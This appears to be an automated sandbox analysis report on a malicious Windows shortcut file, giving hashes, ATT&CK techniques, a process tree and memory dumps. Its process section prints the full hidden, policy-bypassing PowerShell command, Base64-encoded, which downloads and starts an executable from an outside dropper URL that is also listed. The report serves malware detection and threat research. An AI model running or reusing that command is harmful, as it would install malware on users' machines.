Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 01:35

General

  • Target

    olineformN98898778.lnk

  • Size

    1KB

  • MD5

    04e0fea48dfed1e026c3104e0d6aff88

  • SHA1

    e639b0f5a486d5dffef28373ca2df867f99e7fb2

  • SHA256

    76a5649587a8874b1b1a5b3a37d281a4194e8a19947ca33f2d12d12d53509d39

  • SHA512

    c9e5ff0b7d9ddd4b47a57438115acd29338bc5c1e98c9a5f3a61405de90a43eea60c3b1ecf0c25326d4a506b4ae2e2970e794a2f5e1c4d911e89aeed73dbeba4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gpower.5gbfree.com/pix.exe

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\olineformN98898778.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABzAHQAYQByAHQAIAAiAHcAaQBuAGcAYQB0AC4AZQB4AGUAIgA7ACAAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIABoAHQAdABwADoALwAvAGcAcABvAHcAZQByAC4ANQBnAGIAZgByAGUAZQAuAGMAbwBtAC8AcABpAHgALgBlAHgAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIAOwAgAHMAdABhAHIAdAAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2532

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2532-38-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp
    Filesize

    4KB

  • memory/2532-39-0x000000001B4D0000-0x000000001B7B2000-memory.dmp
    Filesize

    2.9MB

  • memory/2532-43-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2532-42-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2532-41-0x0000000001F60000-0x0000000001F68000-memory.dmp
    Filesize

    32KB

  • memory/2532-40-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2532-44-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2532-45-0x0000000002CB0000-0x0000000002CD2000-memory.dmp
    Filesize

    136KB

  • memory/2532-46-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2532-47-0x00000000028B0000-0x00000000028C2000-memory.dmp
    Filesize

    72KB

  • memory/2532-48-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB